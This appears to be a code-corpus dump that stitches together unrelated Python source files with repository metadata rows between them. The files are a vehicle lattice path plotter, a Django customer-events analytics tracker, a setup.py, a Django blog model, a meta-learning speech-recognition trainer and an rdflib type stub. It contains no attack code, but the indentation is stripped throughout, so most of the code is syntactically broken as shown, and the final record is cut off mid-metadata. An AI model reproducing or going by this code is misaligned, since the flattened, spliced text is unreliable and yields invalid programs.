lateral_step = 0.5
s0 = 100.0  # global variable, adjusted globally
lane_width = 3.75
refLineRho = lane_width*0.5
laneChaneRefLine = lane_width*1.5
start_SRho = [s0, refLineRho, 0.0 * math.pi / 180.0]
static_obs = [[s0 + 20, refLineRho - 0.3], [s0 + 40, refLineRho + 0.5], [s0 + 70, refLineRho - 0.2]]
obstacleHeading = 0.0
def sampling(x_row, y_column, lateral_step, longitudinal_step):
"""
:param x_row: s采样个数
:param y_column: lateral采样个数
:param lateral_step: 采样步长
:param longitudinal_step: 纵向采样步长
:return:s-rho坐标系端点
"""
end_set = np.empty(shape=[x_row, y_column, 3])
for i in range(x_row):
x_i = (i + 1) * longitudinal_step + start_SRho[0]
for j in range(y_column):
y_i = (j - lane_width) * lateral_step + laneChaneRefLine
target_point = [x_i, y_i, 0.0 * math.pi / 180.0]
end_set[i, j] = np.array(target_point)
return end_set
def generate_lattice(efficients):
end_set = sampling(longitudinal_num, lateral_num, lateral_step, longitudinal_step)
# print(end_set)
end_size = end_set.shape
# print("end_size:")
# print(end_size)
    # build the graph edges from the vehicle start point to the first column of sampling points
for i in range(end_size[1]):
s, rho, thetaRho = cubic.Polynomial(start_SRho, end_set[0, i])
x = []
y = []
# print(s)
for j in range(len(s)):
tmpX, tmpY, tmpTheta = ftc.frenetToXY(s[j], rho[j], thetaRho[j], efficients)
x.append(tmpX)
y.append(tmpY)
# plt.scatter(end_set[0, i][0], end_set[0, i][1], color='b', s=2, alpha=0.8)
plt.plot(x, y, c='b', linewidth=0.2, alpha=1.0)
    # graph edges between successive columns of sampling points
for i in range(end_size[0] - 1):
for j in range(end_size[1]):
# print([i, j])
for q in range(end_size[1]):
# mptg.test_optimize_trajectory(end_set[1, 0], end_set[0, 1])
s, rho, thetaRho = cubic.Polynomial(end_set[i, q], end_set[i + 1, j])
x = []
y = []
# print(s)
for q in range(len(s)):
tmpX, tmpY, tmpTheta = ftc.frenetToXY(s[q], rho[q], thetaRho[q], efficients)
x.append(tmpX)
y.append(tmpY)
# plt.scatter(end_set[i + 1, j][0], end_set[i + 1, j][1], color='b', s=2, alpha=0.8)
plt.plot(x, y, c='b', linewidth=0.1, alpha=0.80)
return None
def plot_arrow(x, y, yaw, length=2, width=0.1):
"""
arrow函数绘制箭头,表示搜索过程中选择的航向角
:param x:
:param y:
:param yaw:航向角
:param length:
:param width:参数值为浮点数,代表箭头尾部的宽度,默认值为0.001
:return:
length_includes_head:代表箭头整体长度是否包含箭头头部的长度,默认值为False
head_width:代表箭头头部的宽度,默认值为3*width,即尾部宽度的3倍
head_length:代表箭头头部的长度度,默认值为1.5*head_width,即头部宽度的1.5倍
shape:参数值为'full'、'left' 、'right',表示箭头的形状,默认值为'full'
overhang:代表箭头头部三角形底边与箭头尾部直接的夹角关系,通过该参数可改变箭头的形状。
默认值为0,即头部为三角形,当该值小于0时,头部为菱形,当值大于0时,头部为鱼尾状
"""
plt.arrow(x, y, length * math.cos(yaw), length * math.sin(yaw), head_length=1.5 * length, head_width=2 * width,
fc='lime', ec='lime')
return None
def plotGraph():
    # plt.rcParams['font.sans-serif'] = ['Times New Roman']  # set to SimHei here if Chinese text must be displayed
    # plt.rcParams['axes.unicode_minus'] = False  # display minus signs correctly
    # # show multilane
    # multiLane.curvePath()
    # # compute the coefficients of the arc-length parametric curve for the multi-lane environment
    # efficients = multiLane.saveEfficients()
    # compute the coefficients of the arc-length parametric curve for the loop environment
efficients = cubicSpline.saveEfficients()
# show sampling path
generate_lattice(efficients)
if show_obstacle:
c = ['r', 'gold', 'darkorange']
for i in range(len(static_obs)):
tmpx, tmpy, tmptheta = ftc.frenetToXY(static_obs[-(i + 1)][0], static_obs[-(i + 1)][1], obstacleHeading,
efficients)
car.simVehicle([tmpx, tmpy], tmptheta, c[i], 0.8)
if showVehicleStart:
tmpx, tmpy, tmptheta = ftc.frenetToXY(start_SRho[0], start_SRho[1], obstacleHeading, efficients)
car.simVehicle([tmpx, tmpy], tmptheta, 'b', 0.8)
font1 = {'family': 'Times New Roman',
'weight': 'normal',
'size': 10,
}
plt.xlabel("x (m)", font1)
plt.ylabel('y (m)', font1)
    # set the size and font of the axis tick labels
plt.tick_params(labelsize=10)
# x = np.array([0.0, 10.0, 20.0, 30.0, 40.0, 50.0])
# x = np.array([0.0, 20.0, 40.0, 60.0, 80.0, 100.0])
# y = np.array([-2.0, -1, 0.0, 1.0, 2.0])
# y = np.array([-2.0, -1, 0.0, 1.0, 2.0])
    # xgroup_labels = ['0.0', '20.0', '40.0', '60.0', '80.0', '100.0']  # x-axis tick labels
    # ygroup_labels = ['-2.0', '-1.0', '0.0', '1.0', '2.0']  # y-axis tick labels
    # plt.xticks(x, xgroup_labels, fontproperties='Times New Roman', fontsize=10)  # default font size is 10
# plt.yticks(y, ygroup_labels, fontproperties='Times New Roman', fontsize=10)
plt.xticks(fontproperties='Times New Roman', fontsize=10)
plt.yticks(fontproperties='Times New Roman', fontsize=10)
plt.xlim(30, 140)
plt.ylim(80, 130)
plt.savefig('../SimGraph/pathLatticeXY3_053002.tiff', dpi=600)
# center_line = plt.plot([0, 105], [0, 0], color='lime', linewidth=0.6, linestyle='-', label='reference line')
# plot_arrow(105, 0, 0)
# plt.legend(loc='upper right')
# plt.legend()
    # save the figure to file and draw the plot
# plt.savefig('/home/ming/桌面/PTPSim/SimGraph/pathLatticeXY5_30_15_26.svg')
def ToPathPlanner(efficients):
# show sampling path
generate_lattice(efficients)
if showVehicleStart:
tmpx, tmpy, tmptheta = ftc.frenetToXY(start_SRho[0], start_SRho[1], obstacleHeading, efficients)
car.simVehicle([tmpx, tmpy], tmptheta, 'b', 0.8)
if __name__ == '__main__':
# plt.style.use('ggplot')
    plt.figure(figsize=(3.5, 3.5 * 0.62))  # units: inches, 3.5
plt.axes([0.2, 0.2, 0.7, 0.7])
plt.axis("equal")
plt.grid(linestyle="--", linewidth=0.5, alpha=1)
plotGraph()
plt.show()
|
[
"ming.ustb@outlook.com"
] |
ming.ustb@outlook.com
|
9fdf1744503ec788d735265bc226b7ba1e8701a8
|
ae7eea42299728df34c5652c52f1b341f449fcd4
|
/customerevents/tracker.py
|
96d4a4db925461f06a69eb395529bcf2a03d6c12
|
[] |
no_license
|
zbyte64/django-customerevents
|
27ef98c4785c021144cf9e343e52c0bd242884f9
|
d16e8f24b8a42cf332e9348b250ce4e9a11b57da
|
refs/heads/master
| 2020-05-30T04:14:30.240862
| 2014-12-10T19:35:41
| 2014-12-10T19:35:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,711
|
py
|
from threading import local
from .backends import get_backends
from .tasks import send_tracking_to_backend, send_tracking_to_backends
SESSION = local()
def get_tracker(request=None):
if hasattr(SESSION, 'tracker'):
if request:
if SESSION.tracker.request:
assert SESSION.tracker.request == request
else:
SESSION.tracker.set_request(request)
return SESSION.tracker
return set_tracker(request)
def set_tracker(request=None):
SESSION.tracker = Tracker(get_backends(), request=request)
return SESSION.tracker
def unset_tracker():
if hasattr(SESSION, 'tracker'):
delattr(SESSION, 'tracker')
class Tracker(object):
def __init__(self, backends, request=None):
self.backends = backends
self.identity = dict()
self.identity_id = None
self.aliases = set()
self.events = list()
self._closed = False
self.set_request(request)
def set_request(self, request):
self.request = request
self.request_meta = dict()
if self.request:
for key, value in request.META.items():
if isinstance(value, basestring):
self.request_meta[key] = value
def to_pystruct(self):
return {
'identity': self.identity_id,
'properties': self.identity,
'aliases': self.aliases,
'events': self.events,
'request_meta': self.request_meta,
}
def close(self):
self._closed = True
def _check_open(self):
return
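        # NOTE: the early return above disables this check, so the assert below is never reached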
assert self._closed is False, 'Tracker object is closed'
def has_data(self):
if not self.identity_id:
return False
return bool(self.aliases) or bool(self.events) or bool(self.identity)
def identify(self, id, properties=None):
self._check_open()
if self.identity_id is not None and id != self.identity_id:
self.alias(self.identity_id, id)
else:
self.identity_id = id
if properties:
self.identity.update(properties)
def set(self, key, value):
self._check_open()
self.identity[key] = value
def event(self, name, properties):
self._check_open()
self.events.append((name, properties))
def alias(self, from_id, to_id):
self._check_open()
assert self.identity_id == from_id
self.aliases.add(from_id)
self.identity_id = to_id
def flush(self):
self.close()
if not hasattr(self, 'bound_trackers'):
self.bound_trackers = list()
if self.identity_id:
for backend in self.backends.values():
self.bound_trackers.append(BoundTracking(self, backend))
elif self.events:
print 'Events found for no identity'
return [tracker for tracker in self.bound_trackers if not tracker.sent]
class BoundTracking(object):
def __init__(self, tracker, backend):
self.tracker = tracker
self.backend = backend
self.sent = False
def _check_sent(self):
assert self.sent is False, 'Tracker is already sent'
@property
def data(self):
return self.tracker.to_pystruct()
def render(self):
'''
Returns html/js for inclusion in a client facing page
'''
self._check_sent()
try:
ret = self.backend.render(self.data)
except NotImplementedError:
raise
else:
self.sent = True
return ret
def send(self):
'''
Directly notifies the backend of the tracked analytics
'''
self._check_sent()
self.sent = True
return self.backend.send(**self.data)
def async_send(self):
'''
Schedules tracking to be sent by a task worker
'''
self._check_sent()
self.sent = True
kwargs = self.tracker.to_pystruct()
kwargs['backend_name'] = self.backend.name
return send_tracking_to_backend.delay(**kwargs)
def identify(identity, _=None, **properties):
tracker = get_tracker()
return tracker.identify(identity, _ or properties)
def send_event(name, _=None, **properties):
tracker = get_tracker()
return tracker.event(name, _ or properties)
def flush():
tracker = get_tracker()
if not tracker.has_data():
return
bound_trackers = tracker.flush()
backend_names = [bt.backend.name for bt in bound_trackers]
kwargs = tracker.to_pystruct()
unset_tracker()
return send_tracking_to_backends.delay(backend_names, **kwargs)
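# A minimal usage sketch (hypothetical caller code; the import path and the
# backend/Celery configuration are assumptions, not part of this module):
#
#   from customerevents.tracker import identify, send_event, flush
#
#   identify('user-42', email='someone@example.com')
#   send_event('purchase', sku='SKU-1', total=19.99)
#   flush()  # schedules send_tracking_to_backends.delay(...) for the configured backends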
|
[
"zbyte64@gmail.com"
] |
zbyte64@gmail.com
|
fcfa88a0ada1b0e76fa893918074a7025147c19c
|
bb29e732c2c5394dc80bee2e5f20958034ca2a91
|
/setup.py
|
0397a4914e5698920e0aa21759cf40e7bb8eaf26
|
[] |
no_license
|
chengjia63/srh_cnn
|
e9814520f167935817c6838390c06d121ab52b2b
|
89227b2d68d60c3938069d2b36514094da123f86
|
refs/heads/master
| 2020-12-12T00:09:19.221037
| 2020-02-18T06:54:32
| 2020-02-18T06:54:32
| 233,991,554
| 0
| 0
| null | 2020-01-15T03:37:12
| 2020-01-15T03:37:11
| null |
UTF-8
|
Python
| false
| false
| 325
|
py
|
from setuptools import setup, find_packages
setup(
    name='srh-cnn',
    packages=find_packages(),
install_requires=[
'setuptools>=41.0.0',
'numpy==1.18.1',
'matplotlib==3.1.2',
'scikit-learn==0.22.1',
'tensorflow-gpu',
'keras==2.3.1',
'opencv-python==4.1.2.30',
'Pillow==7'
]
)
|
[
"chengjia@umich.edu"
] |
chengjia@umich.edu
|
2d7149372e0ce6b3f231d6b52c452197548e012f
|
e0cc8f10d417fdf7870981808d775d41bb8cd2da
|
/blog/models.py
|
f848bccc4e16c3430b25e9b1b10ada0c85e0d13c
|
[] |
no_license
|
aman1100/iCoder
|
70f86eccc2783985c53b63c3517317ab7cfea355
|
a7f53b4ade3ee44dd75434214e8f16e8cfea20ef
|
refs/heads/master
| 2022-12-31T12:18:38.192297
| 2020-10-23T08:10:19
| 2020-10-23T08:10:19
| 297,904,421
| 1
| 2
| null | 2020-09-27T08:35:59
| 2020-09-23T08:31:14
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django.db import models
# Create your models here.
class Post(models.Model):
sno = models.AutoField(primary_key=True)
title = models.CharField(max_length=300)
content = models.TextField()
author = models.CharField(max_length=50)
slug = models.CharField(max_length=150)
    timeStamp = models.DateTimeField(blank=True)
def __str__(self):
return self.title
|
[
"aman.chandna2000@gmail.com"
] |
aman.chandna2000@gmail.com
|
9536ad374c3bb724a992c0d37393e5ae7408b78c
|
fc07f14697ca7872b7e7d4f10af572d823de18d1
|
/trainer/asr/meta_trainer.py
|
6bf2e261aa15b6f7ca0b11ed376057b7ec643dc8
|
[
"MIT"
] |
permissive
|
LJQCN101/meta-transfer-learning
|
6955156fc484bfd5178c7e4968216cd7a8a51fec
|
1ed18e793c31b79a224a5334ed5a5b8a8ac3e71a
|
refs/heads/master
| 2022-11-23T12:22:32.677588
| 2020-07-30T16:39:54
| 2020-07-30T16:39:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,471
|
py
|
import time
import numpy as np
import torch
import logging
import sys
import threading
from copy import deepcopy
from tqdm import tqdm
# from utils import constant
from collections import deque
from utils.functions import save_meta_model, save_discriminator, post_process
from utils.optimizer import NoamOpt
from utils.metrics import calculate_metrics, calculate_cer, calculate_wer, calculate_adversarial
from torch.autograd import Variable
class MetaTrainer():
"""
Trainer class
"""
def __init__(self):
logging.info("Meta Trainer is initialized")
def forward_one_batch(self, model, vocab, src, trg, src_percentages, src_lengths, trg_lengths, smoothing, loss_type, verbose=False, discriminator=None, accent_id=None):
if discriminator is None:
pred, gold, hyp = model(src, src_lengths, trg, verbose=False)
else:
enc_output = model.encode(src, src_lengths)
accent_pred = discriminator(torch.sum(enc_output, dim=1))
pred, gold, hyp = model.decode(enc_output, src_lengths, trg)
# calculate discriminator loss and encoder loss
disc_loss, enc_loss = calculate_adversarial(accent_pred, accent_id)
del enc_output, accent_pred
strs_golds, strs_hyps = [], []
for j in range(len(gold)):
ut_gold = gold[j]
strs_golds.append("".join([vocab.id2label[int(x)] for x in ut_gold]))
for j in range(len(hyp)):
ut_hyp = hyp[j]
strs_hyps.append("".join([vocab.id2label[int(x)] for x in ut_hyp]))
# handling the last batch
seq_length = pred.size(1)
sizes = src_percentages.mul_(int(seq_length)).int()
loss, _ = calculate_metrics(pred, gold, vocab.PAD_ID, input_lengths=sizes, target_lengths=trg_lengths, smoothing=smoothing, loss_type=loss_type)
if loss is None:
print("loss is None")
if loss.item() == float('Inf'):
logging.info("Found infinity loss, masking")
print("Found infinity loss, masking")
loss = torch.where(loss != loss, torch.zeros_like(loss), loss) # NaN masking
# if verbose:
# print(">PRED:", strs_hyps)
# print(">GOLD:", strs_golds)
total_cer, total_wer, total_char, total_word = 0, 0, 0, 0
for j in range(len(strs_hyps)):
strs_hyps[j] = post_process(strs_hyps[j], vocab.special_token_list)
strs_golds[j] = post_process(strs_golds[j], vocab.special_token_list)
cer = calculate_cer(strs_hyps[j].replace(' ', ''), strs_golds[j].replace(' ', ''))
wer = calculate_wer(strs_hyps[j], strs_golds[j])
total_cer += cer
total_wer += wer
total_char += len(strs_golds[j].replace(' ', ''))
total_word += len(strs_golds[j].split(" "))
if verbose:
print('Total CER', total_cer)
print('Total char', total_char)
print("PRED:", strs_hyps)
print("GOLD:", strs_golds, flush=True)
if discriminator is None:
return loss, total_cer, total_char
else:
return loss, total_cer, total_char, disc_loss, enc_loss
def get_lr(self, optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
def train(self, model, vocab, train_data_list, valid_data_list, loss_type, start_it, num_it, args, inner_opt=None, outer_opt=None, evaluate_every=1000, window_size=100, last_summary_every=1000, last_metrics=None, early_stop=10, cpu_state_dict=False, is_copy_grad=False, discriminator=None):
"""
Training
args:
model: Model object
train_data_list: DataLoader object of the training set
valid_data_list: DataLoader object of the valid set
start_it: start it (> 0 if you resume the process)
num_it: last epoch
last_metrics: (if resume)
"""
num_valid_it = args.num_meta_test
history = []
best_valid_val = 1000000000
smoothing = args.label_smoothing
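        # early_stop is expected as a string "<criteria>,<patience>", e.g. "cer,10"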
early_stop_criteria, early_stop_val = early_stop.split(",")[0], int(early_stop.split(",")[1])
count_stop = 0
logging.info("name " + args.name)
total_time = 0
logging.info("TRAIN")
print("TRAIN")
model.train()
# define the optimizer
if inner_opt is None:
inner_opt = torch.optim.SGD(model.parameters(), lr=args.lr)
if outer_opt is None:
outer_opt = torch.optim.Adam(model.parameters(), lr=args.meta_lr)
if discriminator is not None:
disc_opt = torch.optim.Adam(discriminator.parameters(), lr=args.lr_disc)
last_sum_loss = deque(maxlen=window_size)
last_sum_cer = deque(maxlen=window_size)
last_sum_char = deque(maxlen=window_size)
# Define local variables
k_train, k_valid = args.k_train, args.k_valid
train_data_buffer = [[] for manifest_id in range(len(train_data_list))]
# Define batch loader function
def fetch_train_batch(train_data_list, k_train, k_valid, train_buffer):
for manifest_id in range(len(train_data_list)):
batch_data = train_data_list[manifest_id].sample(k_train, k_valid, manifest_id)
train_buffer[manifest_id].insert(0, batch_data)
return train_buffer
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([train_data_list, k_train, k_valid, train_data_buffer]))
prefetch.start()
beta = 1
beta_decay = 0.99997
it = start_it
while it < num_it:
# Wait until the next batch data is ready
prefetch.join()
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([train_data_list, k_train, k_valid, train_data_buffer]))
prefetch.start()
# Buffer for accumulating loss
batch_loss = 0
total_loss, total_cer = 0, 0
total_char = 0
total_disc_loss, total_enc_loss = 0, 0
# Local variables
weights_original = None
train_tmp_buffer = None
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = None, None, None, None, None
tr_loss, val_loss = None, None
disc_loss, enc_loss = None, None
try:
# Start execution time
start_time = time.time()
# Prepare model state dict (Based on experiment it doesn't yield any difference)
if cpu_state_dict:
model.cpu()
weights_original = deepcopy(model.state_dict())
model.cuda()
else:
weights_original = deepcopy(model.state_dict())
# Reinit outer opt
outer_opt.zero_grad()
if discriminator is not None:
disc_opt.zero_grad()
if is_copy_grad:
model.zero_copy_grad() # initialize copy_grad with 0
if discriminator is not None:
discriminator.zero_copy_grad()
# Pop buffer for all manifest first
# so we can maintain the same number in the buffer list if exception occur
train_tmp_buffer = []
for manifest_id in range(len(train_data_buffer)):
train_tmp_buffer.insert(0, train_data_buffer[manifest_id].pop())
# Start meta-training
# Loop over all tasks
for manifest_id in range(len(train_tmp_buffer)):
# Retrieve manifest data
tr_data, val_data = train_tmp_buffer.pop()
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = tr_data
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = val_data
if args.cuda:
tr_inputs = tr_inputs.cuda()
tr_targets = tr_targets.cuda()
# Meta Train
model.train()
tr_loss, tr_cer, tr_num_char = self.forward_one_batch(model, vocab, tr_inputs, tr_targets, tr_percentages, tr_input_sizes, tr_target_sizes, smoothing, loss_type, verbose=False)
# Update train evaluation metric
total_cer += tr_cer
total_char += tr_num_char
# Delete unused references
del tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes, tr_data
# Inner Backward
inner_opt.zero_grad()
tr_loss = tr_loss / len(train_data_list)
tr_loss.backward()
# Delete unused references
del tr_loss
# Inner Update
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
inner_opt.step()
# Move validation to cuda
if args.cuda:
val_inputs = val_inputs.cuda()
val_targets = val_targets.cuda()
# Meta Validation
if discriminator is None:
val_loss, val_cer, val_num_char = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type)
else:
val_loss, val_cer, val_num_char, disc_loss, enc_loss = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type, discriminator=discriminator, accent_id=manifest_id)
# Delete unused references
del val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes, val_data
# batch_loss += val_loss
total_loss += val_loss.item()
# adversarial training
if discriminator is not None:
if args.beta_decay:
beta = beta * beta_decay
disc_loss = beta * disc_loss
else:
disc_loss = 0.5 * disc_loss
total_disc_loss += disc_loss.item()
total_enc_loss += enc_loss.item()
val_loss = val_loss + enc_loss + disc_loss
# outer loop optimization
if is_copy_grad:
val_loss = val_loss / len(train_data_list)
val_loss.backward()
model.add_copy_grad() # add model grad to copy grad
if discriminator is not None:
discriminator.add_copy_grad() # add discriminator grad to copy grad
else:
batch_loss += val_loss / len(train_data_list)
# Delete unused references
del val_loss
if discriminator is not None:
del enc_loss, disc_loss
# Reset Weight
model.load_state_dict(weights_original)
# Delete copy weight
weights_original = None
# Outer loop optimization
if is_copy_grad:
model.from_copy_grad() # copy grad from copy_grad to model
if discriminator is not None: # copy grad from copy_grad to discriminator
discriminator.from_copy_grad()
disc_opt.step()
else:
batch_loss.backward()
del batch_loss
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
outer_opt.step()
# Record performance
last_sum_cer.append(total_cer)
last_sum_char.append(total_char)
last_sum_loss.append(total_loss/len(train_data_list))
# Record execution time
end_time = time.time()
diff_time = end_time - start_time
total_time += diff_time
if discriminator is None:
print("(Iteration {}) TRAIN LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
logging.info("(Iteration {}) TRAIN LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
else:
print("(Iteration {}) TRAIN LOSS:{:.4f} DISC LOSS:{:.4f} ENC LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_disc_loss/len(train_data_list), total_enc_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
logging.info("(Iteration {}) TRAIN LOSS:{:.4f} DISC LOSS:{:.4f} ENC LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_disc_loss/len(train_data_list), total_enc_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
if (it + 1) % last_summary_every == 0:
print("(Summary Iteration {} | MA {}) TRAIN LOSS:{:.4f} CER:{:.2f}%".format(
(it+1), window_size, sum(last_sum_loss)/len(last_sum_loss), sum(last_sum_cer)*100/sum(last_sum_char)), flush=True)
logging.info("(Summary Iteration {} | MA {}) TRAIN LOSS:{:.4f} CER:{:.2f}%".format(
(it+1), window_size, sum(last_sum_loss)/len(last_sum_loss), sum(last_sum_cer)*100/sum(last_sum_char)))
# Start meta-test
if (it + 1) % evaluate_every == 0:
print("")
logging.info("VALID")
# Define local variables
valid_data_buffer = [[] for manifest_id in range(len(valid_data_list))]
# Buffer for accumulating loss
valid_batch_loss = 0
valid_total_loss, valid_total_cer = 0, 0
valid_total_char = 0
valid_last_sum_loss = deque(maxlen=window_size)
valid_last_sum_cer = deque(maxlen=window_size)
valid_last_sum_char = deque(maxlen=window_size)
# Local variables
weights_original = None
valid_tmp_buffer = None
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([valid_data_list, k_train, k_valid, valid_data_buffer]))
prefetch.start()
valid_it = 0
while valid_it < num_valid_it:
# Wait until the next batch data is ready
prefetch.join()
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([valid_data_list, k_train, k_valid, valid_data_buffer]))
prefetch.start()
# Start execution time
start_time = time.time()
# Prepare model state dict (Based on experiment it doesn't yield any difference)
if cpu_state_dict:
model.cpu()
weights_original = deepcopy(model.state_dict())
model.cuda()
else:
weights_original = deepcopy(model.state_dict())
# Reinit outer opt
outer_opt.zero_grad()
if is_copy_grad:
model.zero_copy_grad() # initialize copy_grad with 0
# Pop buffer for all manifest first
# so we can maintain the same number in the buffer list if exception occur
valid_tmp_buffer = []
for manifest_id in range(len(valid_data_buffer)):
valid_tmp_buffer.insert(0, valid_data_buffer[manifest_id].pop())
# Start meta-testing
# Loop over all tasks
for manifest_id in range(len(valid_tmp_buffer)):
# Retrieve manifest data
tr_data, val_data = valid_tmp_buffer.pop()
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = tr_data
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = val_data
if args.cuda:
tr_inputs = tr_inputs.cuda()
tr_targets = tr_targets.cuda()
# Meta Train
model.train()
tr_loss, tr_cer, tr_num_char = self.forward_one_batch(model, vocab, tr_inputs, tr_targets, tr_percentages, tr_input_sizes, tr_target_sizes, smoothing, loss_type, verbose=False)
# Update train evaluation metric
valid_total_cer += tr_cer
valid_total_char += tr_num_char
# Delete unused references
del tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes, tr_data
# Inner Backward
inner_opt.zero_grad()
tr_loss.backward()
# Delete unused references
del tr_loss
# Inner Update
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
inner_opt.step()
# Move validation to cuda
if args.cuda:
val_inputs = val_inputs.cuda()
val_targets = val_targets.cuda()
# Meta Validation
model.eval()
with torch.no_grad():
val_loss, val_cer, val_num_char = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type)
                        # Update meta-validation evaluation metrics
                        valid_total_loss += val_loss.item()
                        valid_total_cer += val_cer
                        valid_total_char += val_num_char
# Delete unused references
del val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes, val_data
del val_loss
# Reset Weight
model.load_state_dict(weights_original)
# Record performance
valid_last_sum_cer.append(valid_total_cer)
valid_last_sum_char.append(valid_total_char)
valid_last_sum_loss.append(valid_total_loss/len(valid_data_list))
# Record execution time
end_time = time.time()
diff_time = end_time - start_time
total_time += diff_time
valid_it += 1
print("(Summary Iteration {}) VALID LOSS:{:.4f} CER:{:.2f}% TOTAL TIME:{:.7f}".format(
(it+1), sum(valid_last_sum_loss)/len(valid_last_sum_loss), sum(valid_last_sum_cer)*100/sum(valid_last_sum_char), total_time), flush=True)
logging.info("(Summary Iteration {}) VALID LOSS:{:.4f} CER:{:.2f}% TOTAL TIME:{:.7f}".format(
(it+1), sum(valid_last_sum_loss)/len(valid_last_sum_loss), sum(valid_last_sum_cer)*100/sum(valid_last_sum_char), total_time))
metrics = {}
avg_valid_loss = sum(valid_last_sum_loss)/len(valid_last_sum_loss)
avg_valid_cer = sum(valid_last_sum_cer)*100/sum(valid_last_sum_char)
metrics["avg_valid_loss"] = sum(valid_last_sum_loss)/len(valid_last_sum_loss)
metrics["avg_valid_cer"] = sum(valid_last_sum_cer)*100/sum(valid_last_sum_char)
metrics["history"] = history
history.append(metrics)
if (it+1) % args.save_every == 0:
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=False)
if discriminator is not None:
save_discriminator(discriminator, (it+1), disc_opt, args, best_model=False)
# save the best model
if early_stop_criteria == "cer":
print("CRITERIA: CER")
if best_valid_val > avg_valid_cer:
count_stop = 0
best_valid_val = avg_valid_cer
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=True)
if discriminator is not None:
save_discriminator(discriminator, (it+1), disc_opt, args, best_model=True)
else:
print("count_stop:", count_stop)
count_stop += 1
else:
print("CRITERIA: LOSS")
if best_valid_val > avg_valid_loss:
count_stop = 0
best_valid_val = avg_valid_loss
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=True)
else:
count_stop += 1
print("count_stop:", count_stop)
if count_stop >= early_stop_val:
logging.info("EARLY STOP")
print("EARLY STOP\n")
break
# Increment iteration
it += 1
except KeyboardInterrupt:
raise
except Exception as e:
print('Error: {}, fetching new data...'.format(e), flush=True)
logging.info('Error: {}, fetching new data...'.format(e))
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = None, None, None, None, None
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = None, None, None, None, None
tr_loss, val_loss = None, None
weights_original = None
batch_loss = 0
if discriminator is not None:
disc_loss, enc_loss = None, None
torch.cuda.empty_cache()
|
[
"gentaindrawinata@gmail.com"
] |
gentaindrawinata@gmail.com
|
afe3734274673293bc738c0825825646c0a6fddf
|
14ff5ca733ce92c14dd347e32c7ad262026c48cf
|
/typeshed/rdflib/tools/graphisomorphism.pyi
|
72650c110cb60606c52f67b9186a635184d78dd3
|
[
"Apache-2.0"
] |
permissive
|
common-workflow-language/cwlprov-py
|
6040bd1ea18fb58909bba9874f65e4edcc4ecd92
|
9b719c687484d3f888eb5f807ec3270e9081078a
|
refs/heads/main
| 2023-08-17T06:03:39.274209
| 2022-07-19T18:09:15
| 2022-07-19T18:21:13
| 148,144,870
| 1
| 2
|
Apache-2.0
| 2023-08-02T18:35:35
| 2018-09-10T11:27:31
|
Python
|
UTF-8
|
Python
| false
| false
| 590
|
pyi
|
from collections.abc import Generator
from rdflib import BNode as BNode, Graph as Graph
from typing import Any
class IsomorphicTestableGraph(Graph):
hash: Any
def __init__(self, **kargs) -> None: ...
def internal_hash(self): ...
def hashtriples(self) -> Generator[Any, None, None]: ...
def vhash(self, term, done: bool = ...): ...
def vhashtriples(self, term, done) -> Generator[Any, None, None]: ...
def vhashtriple(self, triple, term, done) -> Generator[Any, None, None]: ...
def __eq__(self, G): ...
def __ne__(self, G): ...
def main() -> None: ...
|
[
"1330696+mr-c@users.noreply.github.com"
] |
1330696+mr-c@users.noreply.github.com
|
4421f9722d3ddb7c18d3154c684901a423c77975
|
4cdc9ba739f90f6ac4bcd6f916ba194ada77d68c
|
/剑指offer/第四遍/59-2.队列的最大值.py
|
eab66a3f27e05f26ce4c57438bfeb7bdae84ad74
|
[] |
no_license
|
leilalu/algorithm
|
bee68690daf836cc5807c3112c2c9e6f63bc0a76
|
746d77e9bfbcb3877fefae9a915004b3bfbcc612
|
refs/heads/master
| 2020-09-30T15:56:28.224945
